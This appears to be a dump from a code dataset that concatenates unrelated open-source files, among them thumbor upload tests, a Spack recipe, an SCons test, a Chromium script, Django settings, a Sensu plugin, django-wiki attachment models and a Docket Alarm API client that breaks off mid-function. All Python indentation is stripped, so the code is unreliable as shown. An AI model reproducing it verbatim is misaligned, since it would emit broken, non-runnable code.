uri = self.base_uri + '/an/unknown/image'
response = self.delete(uri, {})
expect(response.code).to_equal(404)
class UploadAPIRetrieveTestCase(UploadTestCase):
def get_context(self):
self.default_filename = 'image'
cfg = Config()
cfg.UPLOAD_ENABLED = True
cfg.UPLOAD_PHOTO_STORAGE = 'thumbor.storages.file_storage'
cfg.FILE_STORAGE_ROOT_PATH = self.root_path
cfg.UPLOAD_DELETE_ALLOWED = True
cfg.UPLOAD_PUT_ALLOWED = False
cfg.UPLOAD_DEFAULT_FILENAME = self.default_filename
importer = Importer(cfg)
importer.import_modules()
return Context(None, cfg, importer)
def test_can_retrieve_existing_image(self):
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, valid_image())
expect(response.code).to_equal(201)
location = response.headers['Location']
response = self.get(location, {'Accept': 'image/jpeg'})
expect(response.code).to_equal(200)
expect(response.body).to_be_similar_to(valid_image())
expect(response.headers['Content-Type']).to_equal('image/jpeg')
def test_retrieving_unknown_image_returns_not_found(self):
uri = self.base_uri + '/an/unknown/image'
response = self.get(uri, {'Accept': 'image/jpeg'})
expect(response.code).to_equal(404)
class UploadAPIValidationTestCase(UploadTestCase):
'''
Validation :
- Invalid image
- Size constraints
- Weight constraints
'''
def get_context(self):
self.default_filename = 'image'
cfg = Config()
cfg.UPLOAD_ENABLED = True
cfg.UPLOAD_PUT_ALLOWED = True
cfg.UPLOAD_PHOTO_STORAGE = 'thumbor.storages.file_storage'
cfg.FILE_STORAGE_ROOT_PATH = self.root_path
cfg.UPLOAD_DEFAULT_FILENAME = self.default_filename
cfg.MIN_WIDTH = 40
cfg.MIN_HEIGHT = 40
cfg.UPLOAD_MAX_SIZE = 72000
importer = Importer(cfg)
importer.import_modules()
return Context(None, cfg, importer)
def test_posting_invalid_image_fails(self):
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, 'invalid image')
expect(response.code).to_equal(415)
def test_posting_invalid_image_through_html_form_fails(self):
image = ('media', u'crocodile9999.jpg', 'invalid image')
response = self.post_files(self.base_uri, {}, (image, ))
expect(response.code).to_equal(415)
def test_modifying_existing_image_to_invalid_image(self):
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, valid_image())
expect(response.code).to_equal(201)
location = response.headers['Location']
response = self.put(location, {'Content-Type': 'image/jpeg'}, 'invalid image')
expect(response.code).to_equal(415)
expected_path = self.get_path_from_location(location)
expected_path = self.upload_storage.path_on_filesystem(expected_path)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(valid_image_path)
def test_posting_a_too_small_image_fails(self):
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, too_small_image())
expect(response.code).to_equal(412)
def test_posting_a_too_small_image_from_html_form_fails(self):
image = ('media', u'crocodile9999.jpg', too_small_image())
response = self.post_files(self.base_uri, {}, (image, ))
expect(response.code).to_equal(412)
def test_modifying_existing_image_to_small_image(self):
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, valid_image())
expect(response.code).to_equal(201)
location = response.headers['Location']
response = self.put(location, {'Content-Type': 'image/jpeg'}, too_small_image())
expect(response.code).to_equal(412)
expected_path = self.get_path_from_location(location)
expected_path = self.upload_storage.path_on_filesystem(expected_path)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(valid_image_path)
def test_posting_an_image_too_heavy_fails(self):
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, too_heavy_image())
expect(response.code).to_equal(412)
def test_posting_an_image_too_heavy_through_an_html_form_fails(self):
image = ('media', u'oversized9999.jpg', too_heavy_image())
response = self.post_files(self.base_uri, {}, (image, ))
expect(response.code).to_equal(412)
def test_modifying_existing_image_to_heavy_image_fails(self):
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, valid_image())
location = response.headers['Location']
response = self.put(location, {'Content-Type': 'image/jpeg'}, too_heavy_image())
expect(response.code).to_equal(412)
expected_path = self.get_path_from_location(location)
expected_path = self.upload_storage.path_on_filesystem(expected_path)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(valid_image_path)
| mit | 5,535,279,842,212,091,000 | 37.764865 | 120 | 0.650003 | false |
EmreAtes/spack | var/spack/repos/builtin/packages/r-cellranger/package.py | 5 | 1774 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RCellranger(RPackage):
"""Helper functions to work with spreadsheets and the "A1:D10"
style of cell range specification."""
homepage = "https://cran.r-project.org/package=cellranger"
url = "https://cran.r-project.org/src/contrib/cellranger_1.1.0.tar.gz"
list_url = "https://cran.r-project.org/src/contrib/Archive/cellranger"
version('1.1.0', '1abcfea6af5ab2e277cb99e86880456f')
depends_on('r-rematch', type=('build', 'run'))
depends_on('r-tibble', type=('build', 'run'))
| lgpl-2.1 | 4,760,725,381,321,043,000 | 44.487179 | 79 | 0.673619 | false |
timj/scons | test/File.py | 1 | 2021 | #!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Verify that:
-- the File() global function and environment method work correctly;
-- the former does not try to expand construction variables;
-- calling File() as a method of a File() object works correctly.
"""
import TestSCons
test = TestSCons.TestSCons()
test.write('SConstruct', """
env = Environment(FOO = 'fff', BAR = 'bbb')
print(File('ddd'))
print(File('$FOO'))
print(File('${BAR}_$BAR'))
print(env.File('eee'))
print(env.File('$FOO'))
print(env.File('${BAR}_$BAR'))
f1 = env.File('f1')
print(f1)
f2 = f1.File('f2')
print(f2)
""")
expect = test.wrap_stdout(read_str = """\
ddd
$FOO
${BAR}_$BAR
eee
fff
bbb_bbb
f1
f2
""", build_str = """\
scons: `.' is up to date.
""")
test.run(stdout = expect)
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mit | -4,071,899,227,670,189,600 | 26.310811 | 73 | 0.70856 | false |
gx1997/chrome-loongson | chrome/test/gpu/generate_webgl_conformance_test_list.py | 6 | 3335 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Auto-generates the WebGL conformance test list header file.
Parses the WebGL conformance test *.txt file, which contains a list of URLs
for individual conformance tests (each on a new line). It recursively parses
*.txt files. For each test URL, the matching gtest call is created and
sent to the C++ header file.
"""
import getopt
import os
import re
import sys
COPYRIGHT = """\
// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
"""
WARNING = """\
// DO NOT EDIT! This file is auto-generated by
// generate_webgl_conformance_test_list.py
// It is included by webgl_conformance_tests.cc
"""
HEADER_GUARD = """\
#ifndef CHROME_TEST_GPU_WEBGL_CONFORMANCE_TEST_LIST_AUTOGEN_H_
#define CHROME_TEST_GPU_WEBGL_CONFORMANCE_TEST_LIST_AUTOGEN_H_
"""
HEADER_GUARD_END = """
#endif // CHROME_TEST_GPU_WEBGL_CONFORMANCE_TEST_LIST_AUTOGEN_H_
"""
# Assume this script is run from the src/chrome/test/gpu directory.
INPUT_DIR = "../../../third_party/webgl_conformance"
INPUT_FILE = "00_test_list.txt"
OUTPUT_FILE = "webgl_conformance_test_list_autogen.h"
def main(argv):
"""Main function for the WebGL conformance test list generator.
"""
if not os.path.exists(os.path.join(INPUT_DIR, INPUT_FILE)):
print >> sys.stderr, "ERROR: WebGL conformance tests do not exist."
print >> sys.stderr, "Run the script from the directory containing it."
return 1
output = open(OUTPUT_FILE, "w")
output.write(COPYRIGHT)
output.write(WARNING)
output.write(HEADER_GUARD)
test_prefix = {}
unparsed_files = [INPUT_FILE]
while unparsed_files:
filename = unparsed_files.pop(0)
try:
input = open(os.path.join(INPUT_DIR, filename))
except IOError:
print >> sys.stderr, "WARNING: %s does not exist (skipped)." % filename
continue
for url in input:
url = re.sub("//.*", "", url)
url = re.sub("#.*", "", url)
url = url.strip()
# Some filename has options before them, for example,
# --min-version 1.0.2 testname.html
pos = url.rfind(" ")
if pos != -1:
url = url[pos+1:]
if not url:
continue
# Cannot use os.path.join() because Windows with use "\\" but this path
# is sent through javascript.
if os.path.dirname(filename):
url = "%s/%s" % (os.path.dirname(filename), url)
# Queue all text files for parsing, because test list URLs are nested
# through .txt files.
if re.match(".+00_test_list\.txt\s*$", url):
unparsed_files.append(url)
# Convert the filename to a valid test name and output the gtest code.
else:
name = os.path.splitext(url)[0]
name = re.sub("\W+", "_", name)
if os.path.exists(os.path.join(INPUT_DIR, url)):
output.write('CONFORMANCE_TEST(%s,\n "%s");\n' % (name, url))
else:
print >> sys.stderr, "WARNING: %s does not exist (skipped)." % url
input.close()
output.write(HEADER_GUARD_END)
output.close()
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
| bsd-3-clause | -1,629,094,933,993,838,800 | 29.87963 | 77 | 0.652774 | false |
pdogg/ctfmanager | ctfmanager/settings.py | 1 | 5269 | # Django settings for ctfmanager project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'boarddb', # Or path to database file if using sqlite3.
'USER': 'boarddb', # Not used with sqlite3.
'PASSWORD': 'password', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/{{ docs_version }}/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ['ctfboard.ctf']
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/New_York'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = '/var/www/static/'
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'CHANGE THIS SECRET KEY!!!'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'ctfmanager.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'ctfweb'
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| bsd-3-clause | -4,864,696,140,094,106,000 | 34.126667 | 120 | 0.687797 | false |
aacole/ursula-monitoring | sensu/plugins/metrics-process-usage.py | 3 | 3957 | #!/usr/bin/env python
#
# metrics-process-usage.py
#
# PLATFORMS:
# Linux
#
# DEPENDENCIES:
# Python 2.7+ (untested on Python3, should work though)
# Python module: psutil https://pypi.python.org/pypi/psutil
#
# USAGE:
#
# metrics-process-usage.py -n <process_name> -w <cpu_warning_pct> -c <cpu_critical_pct> -W <mem_warning_pct> -C <mem_critical_pct> [-s <graphite_scheme>] [-z <criticality>]
#
# DESCRIPTION:
# Finds the pid[s] corresponding to a process name and obtains the necessary
# cpu and memory usage stats. Returns WARNING or CRITICAL when these stats
# exceed user specified limits.
#
# Code adapted from Jaime Gogo's script in the Sensu Plugins community:
# https://github.com/sensu-plugins/sensu-plugins-process-checks/blob/master/bin/metrics-per-process.py
#
# Released under the same terms as Sensu (the MIT license); see MITLICENSE
# for details.
#
# Siva Mullapudi <[email protected]>
import argparse
import sys
import os
import time
import psutil
STATE_OK = 0
STATE_WARNING = 1
STATE_CRITICAL = 2
CRITICALITY = 'critical'
PROC_ROOT_DIR = '/proc/'
def switch_on_criticality():
if CRITICALITY == 'warning':
sys.exit(STATE_WARNING)
else:
sys.exit(STATE_CRITICAL)
def find_pids_from_name(process_name):
'''Find process PID from name using /proc/<pids>/comm'''
pids_in_proc = [ pid for pid in os.listdir(PROC_ROOT_DIR) if pid.isdigit() ]
pids = []
for pid in pids_in_proc:
path = PROC_ROOT_DIR + pid
if 'comm' in os.listdir(path):
file_handler = open(path + '/comm', 'r')
if file_handler.read().rstrip() == process_name:
pids.append(int(pid))
return pids
def sum_dicts(dict1, dict2):
return dict(dict1.items() + dict2.items() +
[(k, dict1[k] + dict2[k]) for k in dict1.viewkeys() & dict2.viewkeys()])
def stats_per_pid(pid):
'''Gets process stats, cpu and memory usage in %, using the psutil module'''
stats = {}
process_handler = psutil.Process(pid)
stats['cpu_percent'] = process_handler.cpu_percent(interval=0.1)
stats['memory_percent'] = process_handler.memory_percent()
return stats
def multi_pid_process_stats(pids):
stats = {'cpu_percent': 0, 'memory_percent': 0}
for pid in pids:
stats = sum_dicts(stats, stats_per_pid(pid))
return stats
def graphite_printer(stats, graphite_scheme):
now = time.time()
for stat in stats:
print "%s.%s %s %d" % (graphite_scheme, stat, stats[stat], now)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--process_name', required=True)
parser.add_argument('-w', '--cpu_warning_pct', required=True)
parser.add_argument('-c', '--cpu_critical_pct', required=True)
parser.add_argument('-W', '--memory_warning_pct', required=True)
parser.add_argument('-C', '--memory_critical_pct', required=True)
parser.add_argument('-s', '--scheme', required=True)
parser.add_argument('-z', '--criticality', default='critical')
args = parser.parse_args()
CRITICALITY = args.criticality
pids = find_pids_from_name(args.process_name)
if not pids:
print 'Cannot find pids for this process. Enter a valid process name.'
switch_on_criticality()
total_process_stats = multi_pid_process_stats(pids)
graphite_printer(total_process_stats, args.scheme)
if total_process_stats['cpu_percent'] > float(args.cpu_critical_pct) or \
total_process_stats['memory_percent'] > float(args.memory_critical_pct):
print 'CPU Usage and/or memory usage at critical levels!!!'
switch_on_criticality()
if total_process_stats['cpu_percent'] > float(args.cpu_warning_pct) or \
total_process_stats['memory_percent'] > float(args.memory_warning_pct):
print 'Warning: CPU Usage and/or memory usage exceeding normal levels!'
sys.exit(STATE_WARNING)
sys.exit(STATE_OK)
if __name__ == "__main__":
main()
| apache-2.0 | 4,757,682,871,734,637,000 | 31.434426 | 173 | 0.664392 | false |
johanherman/arteria-packs | actions/lib/check_summary_report_modtime.py | 2 | 3009 | #!/usr/bin/python
"""
Usage: check_summary_report_modtime.py </path/with/runfolders> <summary report time age in seconds>
This script will search a the give root directory for runfolder and return a json array of all runfolders
which which have a summary report file that is older than the given time in seconds.
"""
import argparse
import os
import json
import sys
import time
import logging
# create logger
logger = logging.getLogger('check_summary_report_modtime')
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch = logging.StreamHandler()
ch.setFormatter(formatter)
logger.addHandler(ch)
def check_file_older_than(file_to_check, threshold):
summary_report_mtime = os.path.getmtime(file_to_check)
logger.debug("summary report mtime: {0}".format(summary_report_mtime))
current_time = time.time()
logger.debug("current time: {0}".format(current_time))
is_old_enough = (current_time - summary_report_mtime) > threshold
logger.debug("is old enough: {0}".format(is_old_enough))
return is_old_enough
def get_old_enough_runfolders(path_to_search, minimum_summary_report_age, runfolders):
for runfolder in runfolders:
logger.debug("runfolder: {0}".format(runfolder))
summary_report = os.path.join(path_to_search, runfolder, "Summary", "summaryReport.html")
if os.path.isfile(summary_report) and check_file_older_than(summary_report, minimum_summary_report_age):
logger.info("runfolder: {0} is old enough.".format(runfolder))
yield runfolder
else:
logger.info("runfolder: {0} is not old enough or summary report does not exist.".format(runfolder))
def main():
parser = argparse.ArgumentParser(description='Filter runfolders in a directory based on summary report '
'modtime.')
# Required arguments
parser.add_argument('--directory', required=True, help='Root directory to search for runfolders in.')
parser.add_argument('--modtime', required=True, help='The summary file needs to be older than this')
parser.add_argument('--debug', required=False, action='store_true', help='Set to debug mode, possible value 0 or 1.')
parser.set_defaults(debug=False)
try:
args = parser.parse_args()
except Exception as e:
parser.print_help()
sys.exit(1)
path_to_search = args.directory
minimum_summary_report_age = int(args.modtime)
# set log level
if args.debug:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
logger.debug("minimum file age: {0}".format(minimum_summary_report_age))
runfolder_list = (name for name in os.listdir(path_to_search) if os.path.isdir(os.path.join(path_to_search, name)))
old_enough_runfolders = list(get_old_enough_runfolders(path_to_search, minimum_summary_report_age, runfolder_list))
print(json.dumps(old_enough_runfolders))
if __name__ == "__main__":
main()
| mit | -2,863,697,152,162,887,700 | 37.088608 | 121 | 0.69126 | false |
imouren/django-wiki | wiki/plugins/attachments/models.py | 13 | 7440 | # -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
from __future__ import absolute_import
import os.path
from django.db import models
from django.utils.translation import ugettext
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import python_2_unicode_compatible
from django.conf import settings as django_settings
from . import settings
from wiki import managers
from wiki.models.pluginbase import ReusablePlugin
from wiki.models.article import BaseRevisionMixin
from django.db.models import signals
from six.moves import map
from six.moves import zip
from six.moves import range
class IllegalFileExtension(Exception):
"""File extension on upload is not allowed"""
pass
@python_2_unicode_compatible
class Attachment(ReusablePlugin):
objects = managers.ArticleFkManager()
current_revision = models.OneToOneField(
'AttachmentRevision', verbose_name=_('current revision'),
blank=True, null=True, related_name='current_set',
help_text=_(
'The revision of this attachment currently in use (on all articles using the attachment)'),)
original_filename = models.CharField(
max_length=256,
verbose_name=_('original filename'),
blank=True,
null=True)
def can_write(self, user):
if not settings.ANONYMOUS and (not user or user.is_anonymous()):
return False
return ReusablePlugin.can_write(self, user)
def can_delete(self, user):
return self.can_write(user)
class Meta:
verbose_name = _('attachment')
verbose_name_plural = _('attachments')
# Matches label of upcoming 0.1 release
db_table = 'wiki_attachments_attachment'
if settings.APP_LABEL:
app_label = settings.APP_LABEL
def __str__(self):
return "%s: %s" % (
self.article.current_revision.title, self.original_filename)
def extension_allowed(filename):
try:
extension = filename.split(".")[-1]
except IndexError:
# No extension
raise IllegalFileExtension(
ugettext("No file extension found in filename. That's not okay!"))
if not extension.lower() in map(
lambda x: x.lower(),
settings.FILE_EXTENSIONS):
raise IllegalFileExtension(
ugettext("The following filename is illegal: %s. Extension has to be one of %s") %
(filename, ", ".join(
settings.FILE_EXTENSIONS)))
return extension
def upload_path(instance, filename):
from os import path
extension = extension_allowed(filename)
# Has to match original extension filename
if instance.id and instance.attachment and instance.attachment.original_filename:
original_extension = instance.attachment.original_filename.split(
".")[-1]
if not extension.lower() == original_extension:
raise IllegalFileExtension(
"File extension has to be '%s', not '%s'." %
(original_extension, extension.lower()))
elif instance.attachment:
instance.attachment.original_filename = filename
upload_path = settings.UPLOAD_PATH
upload_path = upload_path.replace(
'%aid', str(
instance.attachment.article.id))
if settings.UPLOAD_PATH_OBSCURIFY:
import random
import hashlib
m = hashlib.md5(
str(random.randint(0, 100000000000000)).encode('ascii'))
upload_path = path.join(upload_path, m.hexdigest())
if settings.APPEND_EXTENSION:
filename += '.upload'
return path.join(upload_path, filename)
@python_2_unicode_compatible
class AttachmentRevision(BaseRevisionMixin, models.Model):
attachment = models.ForeignKey('Attachment')
file = models.FileField(upload_to=upload_path, # @ReservedAssignment
max_length=255,
verbose_name=_('file'),
storage=settings.STORAGE_BACKEND)
description = models.TextField(blank=True)
class Meta:
verbose_name = _('attachment revision')
verbose_name_plural = _('attachment revisions')
ordering = ('created',)
get_latest_by = 'revision_number'
# Matches label of upcoming 0.1 release
db_table = 'wiki_attachments_attachmentrevision'
if settings.APP_LABEL:
app_label = settings.APP_LABEL
def get_filename(self):
"""Used to retrieve the filename of a revision.
But attachment.original_filename should always be used in the frontend
such that filenames stay consistent."""
# TODO: Perhaps we can let file names change when files are replaced?
if not self.file:
return None
filename = self.file.name.split("/")[-1]
return ".".join(filename.split(".")[:-1])
def get_size(self):
"""Used to retrieve the file size and not cause exceptions."""
try:
return self.file.size
except OSError:
return None
except ValueError:
return None
def save(self, *args, **kwargs):
if (not self.id and
not self.previous_revision and
self.attachment and
self.attachment.current_revision and
self.attachment.current_revision != self):
self.previous_revision = self.attachment.current_revision
if not self.revision_number:
try:
previous_revision = self.attachment.attachmentrevision_set.latest()
self.revision_number = previous_revision.revision_number + 1
# NB! The above should not raise the below exception, but somehow
# it does.
except AttachmentRevision.DoesNotExist as noattach:
Attachment.DoesNotExist = noattach
self.revision_number = 1
super(AttachmentRevision, self).save(*args, **kwargs)
if not self.attachment.current_revision:
# If I'm saved from Django admin, then article.current_revision is
# me!
self.attachment.current_revision = self
self.attachment.save()
def __str__(self):
return "%s: %s (r%d)" % (self.attachment.article.current_revision.title,
self.attachment.original_filename,
self.revision_number)
def on_revision_delete(instance, *args, **kwargs):
if not instance.file:
return
# Remove file
path = instance.file.path.split("/")[:-1]
instance.file.delete(save=False)
# Clean up empty directories
# Check for empty folders in the path. Delete the first two.
if len(path[-1]) == 32:
# Path was (most likely) obscurified so we should look 2 levels down
max_depth = 2
else:
max_depth = 1
for depth in range(0, max_depth):
delete_path = "/".join(path[:-depth] if depth > 0 else path)
try:
if len(
os.listdir(
os.path.join(
django_settings.MEDIA_ROOT,
delete_path))) == 0:
os.rmdir(delete_path)
except OSError:
# Raised by os.listdir if directory is missing
pass
signals.pre_delete.connect(on_revision_delete, AttachmentRevision)
| gpl-3.0 | 3,964,162,408,002,230,000 | 32.818182 | 104 | 0.619624 | false |
DocketAlarm/pacer-api | api/client.py | 1 | 11985 | import pprint
import base64
import urllib.request, urllib.parse, urllib.error
import urllib.request, urllib.error, urllib.parse
import json
import shelve
__version__ = '1.1'
'''
Docket Alarm Python API Client
Example Usage:
token = call_api("login", "POST", username="[email protected]",
password="pass")
token = token['login_token']
result = call_api("searchpacer", "GET", login_token=token,
client_matter='new search', party_name="Microsoft",
nature_of_suit="830")
'''
################################################################################
# Global API Setings
api = "/api/v1/"
DEBUG = True # View additional debug information
TESTING = False # Automatically turn on testing for all calls.
_INTERNAL_TESTING = False # Used internally
USE_LOCAL = False # For internal development purposes only
# Helpful for command line interaction
PRESS_KEY_BEFORE_CALL = False # Wait for input before making url fetch
PRESS_KEY_AFTER_CALL = False # Wait for input before going to the next step
SEARCH_RESULTS_AT_ONCE = 50 # Results per call when searching in parallel.
TIMEOUT = 120
################################################################################
# The Main API call
def call(call, method="GET", **kwargs):
if method not in ["GET", "POST"]:
raise Exception("Expecting a GET or POST request, not: %s"%method)
if PRESS_KEY_BEFORE_CALL:
input("(press enter to continue)")
# Prepare the URL and arguments
if USE_LOCAL:
base_url = "http://localhost:8080"
else:
base_url = "https://www.docketalarm.com"
url = base_url + api + call + "/"
urlargs = {}
if TESTING:
urlargs['test'] = True
username, password = None, None
if call not in ['login', 'subaccount']:
if 'username' in kwargs:
username = kwargs['username']
del kwargs['username']
if 'password' in kwargs:
password = kwargs['password']
del kwargs['password']
if username and password and kwargs.get('login_token'):
kwargs['login_token'] = ''
# Sort the keywords so they are applied consistently.
sorted_kw = sorted(list(kwargs.items()), key = lambda val: val[0])
urlargs = urllib.parse.urlencode(sorted_kw, doseq=True)
if method == "GET":
url = url + "?" + urlargs
# Allow for debug printing
if DEBUG:
print(("%s: %s"%(method, url)))
if method == "POST":
print(("ARGUMENTS: %s"%pprint.pformat(urlargs)))
# Add an authorization header if provided.
req = urllib.request.Request(url)
if username and password:
auth = base64.encodestring('%s:%s' % (username, password)).strip()
req.add_header("Authorization", "Basic %s" % auth)
# Make the call
if _INTERNAL_TESTING:
out = _INTERNAL_TESTING(method, url, urlargs)
elif method == "GET":
out = urllib.request.urlopen(req, timeout = TIMEOUT).read()
else:
out = urllib.request.urlopen(req, urlargs.encode('UTF-8'), timeout = TIMEOUT).read()
try:
out = json.loads(out)
except:
raise Exception("Not JSON: " + out)
if DEBUG and out and out.get('error'):
print("Error: %s"%out['error'])
if PRESS_KEY_AFTER_CALL:
input("API Call Complete (press enter to continue)")
print("")
return out
################################################################################
# Utilities and Time Saving Helper Functions
import time, logging
from queue import Empty
from multiprocessing import Process
from multiprocessing import Pool as MultiProcessPool
from multiprocessing import Queue as ProcessQueue
def _dl_worker(username, password, client_matter, cached, dlqueue, docketqueue):
'''
A Download worker used by get_dockets to download dockets in parallel.
'''
# Generic login function
login = lambda: call(call="login", method="POST",
username=username, password=password)['login_token']
token, tries = None, 0
while True:
try:
court, docket = dlqueue.get_nowait()
except Empty:
logging.info("Download Queue Done.")
return
except (KeyboardInterrupt, Exception) as e:
logging.info("Worker exception: %s"%e)
return
# Retry handler
for i in range(0, 2):
# Try logging in every so often
try:
if not token or tries % 25 == 0:
token = login()
result = call(call="getdocket", method="GET",
court=court, docket=docket,login_token=token,
client_matter=client_matter, cached=cached)
except Exception as e:
logging.error("Problem accessing %s, %s: %s", court, docket, e)
token = None
tries += 1
result = {'success' : False, 'error':str(e)}
continue
tries += 1
if result and not result.get('success'):
continue
break
# Save the results
docketqueue.put({
'court':court,
'docket':docket,
'result':result,
})
def getdocket_parallel(username, password, client_matter, docket_list,
cached = False, num_workers = 15,
save_progress = None, _async = False):
'''
Download a list of dockets in parallel by launching many processes.
docket_list: A list of (court, docket) tuples
num_workers: How many parallel processes to start
cached: Get cached dockets instead of fresh ones from the court
save_progress Use a temporary file to save work in case we crash.
async If True, we get data asyncrhonously.
'''
if save_progress != None:
if _async == True:
raise NotImplementedError("Cannot save progress and async.")
save_progress = shelve.open(save_progress, 'c')
def get_key(court, docket):
return ("(%s),(%s)"%(court, docket)).encode('ascii', 'ignore')
dockets = []
